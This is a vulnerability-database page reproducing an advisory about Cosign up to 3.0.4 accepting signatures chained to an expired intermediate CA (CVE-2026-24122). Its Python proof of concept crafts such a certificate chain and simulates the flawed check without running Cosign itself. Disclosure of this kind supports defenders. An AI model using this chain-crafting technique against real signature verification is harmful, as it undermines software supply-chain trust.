Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Cosign 3.0.4 Certificate Chain Validation Bypass

🗓️ 25 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 215 Views

Cosign 3.0.4 bypasses chain validation by using issuance time, allowing expired intermediate authority.

Related
Code
ReporterTitlePublishedViews
Family
AlpineLinux		CVE-2026-24122
19 Feb 202622:27
alpinelinux
Circl		CVE-2026-24122
19 Feb 202622:40
circl
CNNVD		cosign 信任管理问题漏洞
19 Feb 202600:00
cnnvd
CVE		CVE-2026-24122
19 Feb 202622:27
cve
Cvelist		CVE-2026-24122 Cosign Certificate Chain Expiry Validation Issue Allows Issuing Certificate Expiry to Be Overlooked
19 Feb 202622:27
cvelist
Debian CVE		CVE-2026-24122
19 Feb 202622:27
debiancve
Github Security Blog		Cosign considered signatures valid with expired intermediate certificates when transparency log verification is skipped
19 Feb 202622:09
github
NVD		CVE-2026-24122
19 Feb 202623:16
nvd
Tenable Nessus		openSUSE 16 Security Update : hauler (openSUSE-SU-2026:20662-1)
5 May 202600:00
nessus
Tenable Nessus		SUSE SLED15 / SLES15 / openSUSE 15 Security Update : cosign (SUSE-SU-2026:0777-1)
6 Mar 202600:00
nessus
Rows per page
=============================================================================================================================================
    | # Title     : Cosign ≤ 3.0.4 Temporal Certificate Chain Validation Bypass in Due to Improper Use of Issuance Time                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/sigstore/cosign/releases                                                                                 |
    =============================================================================================================================================
    
    [+] Summary    : A logical flaw in the certificate verification process of Cosign (≤ 3.0.4) allows signatures to be accepted even when the issuing Intermediate Certificate Authority (CA) has already expired.
                     The vulnerability arises from validating the certificate chain using the leaf certificate’s issuance time (NotBefore) instead of the current system time. 
    				 Because of this, the chain is considered valid if it was valid at the moment the leaf certificate was issued, regardless of whether the Intermediate CA is expired at verification time.
    
    The verification process performs two separate checks:
    
    It validates the certificate chain at the leaf’s issuance time.
    
    It validates that the leaf certificate itself is currently within its validity period.
    
    If both conditions pass, the signature is accepted — even though the Intermediate CA is no longer valid.
    
    [+] POC   :  pip install cryptography
    
    import datetime
    from cryptography import x509
    from cryptography.x509.oid import NameOID
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import ec
    
    def create_poc():
        now = datetime.datetime.utcnow()
    
        root_key = ec.generate_private_key(ec.SECP256R1())
        sub_key = ec.generate_private_key(ec.SECP256R1())
        leaf_key = ec.generate_private_key(ec.SECP256R1())
    
        root_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Root CA")])
        root_cert = (
            x509.CertificateBuilder()
            .subject_name(root_subject)
            .issuer_name(root_subject)
            .public_key(root_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now - datetime.timedelta(hours=10))
            .not_valid_after(now + datetime.timedelta(hours=10))
            .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
            .sign(root_key, hashes.SHA256())
        )
    
        sub_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Expired Intermediate")])
        sub_cert = (
            x509.CertificateBuilder()
            .subject_name(sub_subject)
            .issuer_name(root_subject)
            .public_key(sub_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now - datetime.timedelta(hours=2))
            .not_valid_after(now - datetime.timedelta(minutes=10)) # Expired!
            .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
            .sign(root_key, hashes.SHA256())
        )
    
        leaf_subject = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"Valid Leaf")])
        leaf_cert = (
            x509.CertificateBuilder()
            .subject_name(leaf_subject)
            .issuer_name(sub_subject)
            .public_key(leaf_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now - datetime.timedelta(minutes=30)) 
            .not_valid_after(now + datetime.timedelta(minutes=30))  
            .sign(sub_key, hashes.SHA256())
        )
    
        print("--- Simulating Vulnerable Logic (Cosign <= 3.0.4) ---")
    
        issuance_time = leaf_cert.not_valid_before
        if sub_cert.not_valid_before <= issuance_time <= sub_cert.not_valid_after:
            print(f"[+] Step A: Chain is considered VALID because it was valid at {issuance_time}")
    
        if leaf_cert.not_valid_before <= now <= leaf_cert.not_valid_after:
            print(f"[+] Step B: Leaf is considered VALID at current time {now}")
    
        print("\n[!] RESULT: Vulnerable Cosign would accept this signature!")
    
    if __name__ == "__main__":
        create_poc()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.13.7
EPSS0.00011
SSVC
certificate chainvalidation bypassissuance timeNotBeforeexpired intermediate authority
215